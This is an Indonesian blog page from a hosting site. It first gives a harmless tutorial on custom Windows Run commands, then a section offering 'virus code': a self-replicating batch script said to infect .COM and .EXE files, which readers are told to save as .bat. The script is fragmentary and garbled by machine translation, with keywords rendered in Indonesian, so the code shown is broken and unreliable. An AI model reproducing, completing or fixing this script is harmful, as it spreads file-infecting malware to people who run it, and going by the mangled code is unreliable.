Archive

Hosting Unlimited Indonesia
------------------------------------------------------

HOSTING MURAH

Hosting Unlimited Indonesia

Teman

Home » » Kode Virus Exe

Kode Virus Exe

Cara Membuat Sendiri Disesuaikan Run Perintah Anda
Run Run command The perintah pada sistem operasi Microsoft Windows memungkinkan Anda untuk langsung membuka aplikasi atau dokumen dengan hanya satu perintah, bukan menavigasi ke lokasi itu dan double-klik ikon dieksekusi. Namun, hanya bekerja untuk beberapa program Windows inbuilt seperti Command prompt (cmd), Kalkulator (calc), dll Jadi, apakah Anda pernah bertanya-tanya bagaimana untuk membuat perintah Run Anda sendiri disesuaikan untuk mengakses program favorit Anda, file dan folder? Nah, baca terus untuk mengetahui jawabannya.
Menciptakan Disesuaikan Run Command

Mari saya mengambil contoh bagaimana untuk membuat perintah run disesuaikan untuk membuka internet explorer. Setelah Anda membuat perintah ini, Anda harus bisa membuka explorer internet hanya dengan mengetik "yaitu" (tanpa tanda kutip) di kotak dialog Run. Berikut adalah bagaimana Anda bisa melakukan itu.

1. Klik kanan pada Desktop dan pilih New -> Shortcut.

2. Anda akan melihat "Create Shortcut" kotak dialog seperti gambar dibawah

Create Shortcut

3. Klik "Browse", arahkan ke: Program Files -> Internet Explorer dari drive Akar Anda (biasanya C: \) dan pilih "iexplore" seperti yang ditunjukkan pada gambar di atas dan klik "OK".

4. Sekarang klik "Next" dan ketik setiap nama untuk shortcut Anda. Anda dapat memilih nama apapun sesuai pilihan Anda, ini akan disesuaikan "perintah Run" Anda. Dalam hal ini saya beri nama shortcut saya sebagai "yaitu". Klik "Finish".

5. Anda akan melihat shortcut bernama "yaitu" pada desktop Anda. Yang perlu Anda lakukan adalah hanya menyalin shortcut ini dan paste di folder Windows Anda (biasanya "C :/ Windows"). Setelah Anda telah menyalin shortcut ke folder Windows, Anda dapat menghapus satu pada Desktop Anda.

6. Itu saja! Mulai sekarang, hanya membuka kotak dialog Run, ketik yaitu dan tekan Enter untuk membuka Internet Explorer.

Dengan cara ini Anda dapat membuat perintah Run disesuaikan untuk setiap program pilihan Anda. Katakanlah "ff" untuk Firefox, "ym" untuk Yahoo messenger, "WMP" untuk Windows media player dan sebagainya.

Untuk melakukan hal ini, ketika Anda mengklik pada "Browse" di Step-3, cukup pilih executable utama program target (exe.) Berkas yang biasanya akan terletak di C: \ Program Files folder. Berikan nama yang sederhana dan singkat untuk shortcut ini sesuai pilihan Anda dan salin file shortcut ke folder Windows seperti biasa. Sekarang hanya ketik nama singkat di kotak dialog Run untuk membuka program.

Cara Membuat Kode Virus
Kode VIRUS sederhana di sini: Hanya menyimpan kode berikut sebagai ekstensi bat di notepad..
antivirus akan mendeteksi sebagai virus. lihat sendiri.

Ini akan mempengaruhi *. Com dan *. File EXE.

Ini akan berkembang biak sendiri dan mungkin mendapatkan lebih berbahaya ketika diubah.


@ Echo off> nul.ViRuSif


"% 1 ==" / ViRuS_MULTIPLY goto ViRuS_multiplyif


"% 1 ==" / ViRuS_OUTER_LOOP goto ViRuS_outer_loopif


"% 1 ==" / ViRuS_FINDSELF goto ViRuS_findselfif


"% Voff% ==" T goto ViRuS_OLDBAT


mengatur ViRuSname = 0%


jika tidak ada% 0.bat panggilan% 0 / ViRuS_FINDSELF% path%


jika tidak ada% ViRuSname%. set bat ViRuSname =


jika "% ViRuSname% ==" goto ViRuS_OLDBAT